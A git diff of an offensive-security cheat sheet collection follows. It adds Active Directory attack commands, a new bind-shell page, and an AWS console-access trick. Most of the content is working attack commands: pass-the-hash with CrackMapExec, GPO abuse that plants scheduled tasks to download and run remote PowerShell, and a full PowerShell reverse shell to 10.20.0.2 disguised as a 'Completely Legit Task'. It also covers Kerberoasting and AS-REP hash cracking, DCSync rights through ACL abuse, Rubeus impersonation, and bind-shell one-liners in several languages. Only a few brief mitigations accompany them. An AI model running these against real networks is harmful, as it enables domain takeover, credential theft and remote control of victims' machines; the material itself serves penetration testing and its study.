||||||
|
# https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors
|
||||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||||
or
|
Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
|
||||||
|
|
||||||
|
# or remotely via BloodHound Python
|
||||||
|
# https://github.com/fox-it/BloodHound.py
|
||||||
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
||||||
```
|
```
|
||||||
|
|
||||||
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
||||||
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
apt-get install -y libssl-dev libffi-dev python-dev build-essential
|
# use the latest release, CME is now a binary packaged will all its dependencies
|
||||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip
|
||||||
crackmapexec smb -L
|
|
||||||
crackmapexec smb -M name_module -o VAR=DATA
|
# execute cme (smb, winrm, mssql, ...)
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
root@payload$ cme smb -L
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
|
root@payload$ cme smb -M name_module -o VAR=DATA
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||||
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||||
crackmapexec mimikatz --server http --server-port 80
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||||
|
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
|
||||||
|
root@payload$ cme mimikatz --server http --server-port 80
|
||||||
```
|
```
|
||||||
|
|
||||||
* [Mitm6](https://github.com/fox-it/mitm6.git)
|
* [Mitm6](https://github.com/fox-it/mitm6.git)
|
||||||
|
@ -391,7 +406,14 @@ Get-NetGPOGroup
|
||||||
|
|
||||||
### Exploit Group Policy Objects GPO
|
### Exploit Group Policy Objects GPO
|
||||||
|
|
||||||
|
> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
# Build and configure SharpGPOAbuse
|
||||||
|
git clone https://github.com/FSecureLABS/SharpGPOAbuse
|
||||||
|
Install-Package CommandLineParser -Version 1.9.3.15
|
||||||
|
ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll
|
||||||
|
|
||||||
# Adding User Rights
|
# Adding User Rights
|
||||||
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
@ -405,6 +427,32 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent
|
||||||
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Abuse GPO with **pyGPOAbuse**
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/Hackndo/pyGPOAbuse
|
||||||
|
# Add john user to local administrators group (Password: H4x00r123..)
|
||||||
|
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
|
||||||
|
|
||||||
|
# Reverse shell example
|
||||||
|
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
|
||||||
|
-powershell \
|
||||||
|
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
|
||||||
|
-taskname "Completely Legit Task" \
|
||||||
|
-description "Dis is legit, pliz no delete" \
|
||||||
|
-user
|
||||||
|
```
|
||||||
|
|
||||||
|
Abuse GPO with **PowerView**
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Enumerate GPO
|
||||||
|
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
|
||||||
|
|
||||||
|
# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO
|
||||||
|
New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
|
@ -667,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci
|
||||||
Converting kirbi => ccache
|
Converting kirbi => ccache
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Mitigations:
|
||||||
|
* Hard to detect because they are legit TGT tickets
|
||||||
|
* Mimikatz generate a golden ticket with a life-span of 10 years
|
||||||
|
|
||||||
### Pass-the-Ticket Silver Tickets
|
### Pass-the-Ticket Silver Tickets
|
||||||
|
|
||||||
Forging a TGS require machine accound password (key) or NTLM hash from the KDC
|
Forging a TGS require machine accound password (key) or NTLM hash from the KDC
|
||||||
|
@ -686,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
|
||||||
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Mitigations:
|
||||||
|
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
|
||||||
|
|
||||||
### Kerberoasting
|
### Kerberoasting
|
||||||
|
|
||||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||||
|
@ -719,12 +775,12 @@ Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-fe
|
||||||
Then crack the ticket with hashcat or john
|
Then crack the ticket with hashcat or john
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
hashcat -m 13100 -a 0 hash.txt crackstation.txt
|
./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt
|
||||||
./john ~/hash.txt --wordlist=rockyou.lst
|
./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Mitigations:
|
Mitigations:
|
||||||
* Have a very long password for your accounts with SPNs (> 25 characters)
|
* Have a very long password for your accounts with SPNs (> 32 characters)
|
||||||
* Make sure no users have SPNs
|
* Make sure no users have SPNs
|
||||||
|
|
||||||
### KRB_AS_REP Roasting
|
### KRB_AS_REP Roasting
|
||||||
|
@ -771,6 +827,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||||
Using `impacket` to get the hash and `hashcat` to crack it.
|
Using `impacket` to get the hash and `hashcat` to crack it.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
# example
|
||||||
|
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
|
||||||
|
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||||
|
|
||||||
|
[*] Getting TGT for svc-alfresco
|
||||||
|
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4
|
||||||
|
|
||||||
# extract hashes
|
# extract hashes
|
||||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||||
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||||
|
@ -779,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
|
||||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Mitigations:
|
||||||
|
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
|
||||||
|
|
||||||
### Pass-the-Hash
|
### Pass-the-Hash
|
||||||
|
|
||||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||||||
|
@ -1019,24 +1085,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
||||||
|
|
||||||
### Abusing Active Directory ACLs/ACEs
|
### Abusing Active Directory ACLs/ACEs
|
||||||
|
|
||||||
* **GenericAll on User** : We can reset user's password without knowing the current password
|
|
||||||
* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
|
|
||||||
* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain`
|
|
||||||
* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group
|
|
||||||
* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose`
|
|
||||||
* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
|
|
||||||
* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'`
|
|
||||||
```powershell
|
|
||||||
# give DCSync right to titi
|
|
||||||
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
|
|
||||||
```
|
|
||||||
|
|
||||||
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### GenericAll
|
||||||
|
|
||||||
|
* **GenericAll on User** : We can reset user's password without knowing the current password
|
||||||
|
* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
|
||||||
|
|
||||||
|
GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# using PowerView
|
||||||
|
# Check for interesting permissions on accounts:
|
||||||
|
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
|
||||||
|
|
||||||
|
# Check if current user has already an SPN setted:
|
||||||
|
Get-DomainUser -Identity <UserName> | select serviceprincipalname
|
||||||
|
|
||||||
|
# Force set the SPN on the account:
|
||||||
|
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### GenericWrite
|
||||||
|
|
||||||
|
* Reset another user's password
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1
|
||||||
|
$user = 'DOMAIN\user1';
|
||||||
|
$pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force;
|
||||||
|
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
|
||||||
|
$newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force;
|
||||||
|
Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds;
|
||||||
|
```
|
||||||
|
|
||||||
|
* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
|
||||||
|
|
||||||
|
|
||||||
|
#### WriteDACL
|
||||||
|
|
||||||
|
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Give DCSync right to the principal identity
|
||||||
|
Import-Module .\PowerView.ps1
|
||||||
|
$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force
|
||||||
|
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword)
|
||||||
|
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Trust relationship between domains
|
### Trust relationship between domains
|
||||||
|
|
||||||
|
@ -1193,7 +1294,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||||
[*] Saving ticket in Administrator.ccache
|
[*] Saving ticket in Administrator.ccache
|
||||||
|
|
||||||
# Exploit with Rubeus
|
# Exploit with Rubeus
|
||||||
$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||||
|
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt
|
||||||
|
$ dir \\dc.domain.com\c$
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
@ -1503,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
|
||||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||||
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
|
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
|
||||||
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
|
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
|
||||||
|
@ -1564,3 +1668,9 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||||
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
||||||
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
|
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
|
||||||
|
* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
|
||||||
|
* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
|
||||||
|
* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
|
||||||
|
* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
|
||||||
|
* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
|
||||||
|
* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
|
|
@ -0,0 +1,71 @@
|
||||||
|
# Bind Shell
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Reverse Shell](#reverse-shell)
|
||||||
|
* [Perl](#perl)
|
||||||
|
* [Python](#python)
|
||||||
|
* [PHP](#php)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Netcat Traditional](#netcat-traditional)
|
||||||
|
* [Netcat OpenBsd](#netcat-openbsd)
|
||||||
|
* [Ncat](#ncat)
|
||||||
|
* [Socat](#socat)
|
||||||
|
* [Powershell](#powershell)
|
||||||
|
|
||||||
|
|
||||||
|
## Perl
|
||||||
|
|
||||||
|
```perl
|
||||||
|
perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
|
||||||
|
bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
|
||||||
|
close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
|
||||||
|
```
|
||||||
|
|
||||||
|
## PHP
|
||||||
|
|
||||||
|
```php
|
||||||
|
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
|
||||||
|
socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
|
||||||
|
$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
|
||||||
|
socket_write($cl,$m,strlen($m));}}'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Netcat Traditional
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
nc -nlvp 51337 -e /bin/bash
|
||||||
|
```
|
||||||
|
|
||||||
|
## Netcat OpenBsd
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
|
||||||
|
```
|
||||||
|
|
||||||
|
## Socat
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
|
||||||
|
user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
|
||||||
|
```
|
||||||
|
|
||||||
|
## Powershell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://github.com/besimorhino/powercat
|
||||||
|
|
||||||
|
# Victim (listen)
|
||||||
|
. .\powercat.ps1
|
||||||
|
powercat -l -p 7002 -ep
|
||||||
|
|
||||||
|
# Connect from attacker
|
||||||
|
. .\powercat.ps1
|
||||||
|
powercat -c 127.0.0.1 -p 7002
|
||||||
|
```
|
|
@ -12,6 +12,7 @@
|
||||||
* [Method for Container Service (Fargate)](#method-for-container-service-fargate)
|
* [Method for Container Service (Fargate)](#method-for-container-service-fargate)
|
||||||
* [AWS - Shadow Admin](#aws---shadow-admin)
|
* [AWS - Shadow Admin](#aws---shadow-admin)
|
||||||
* [Admin equivalent permission](#admin-equivalent-permission)
|
* [Admin equivalent permission](#admin-equivalent-permission)
|
||||||
|
* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
|
||||||
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
|
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
|
||||||
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
|
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
|
||||||
* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
|
* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
|
||||||
|
@ -331,6 +332,23 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
||||||
$ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
|
$ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## AWS - Gaining AWS Console Access via API Keys
|
||||||
|
|
||||||
|
A utility to convert your AWS CLI credentials into AWS console access.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$> git clone https://github.com/NetSPI/aws_consoler
|
||||||
|
$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
|
||||||
|
2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
|
||||||
|
2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
|
||||||
|
2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
|
||||||
|
2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
|
||||||
|
2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
|
||||||
|
2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
|
||||||
|
2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
|
||||||
|
https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED
|
||||||
|
```
|
||||||
|
|
||||||
## AWS - Mount EBS volume to EC2 Linux
|
## AWS - Mount EBS volume to EC2 Linux
|
||||||
|
|
||||||
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
|
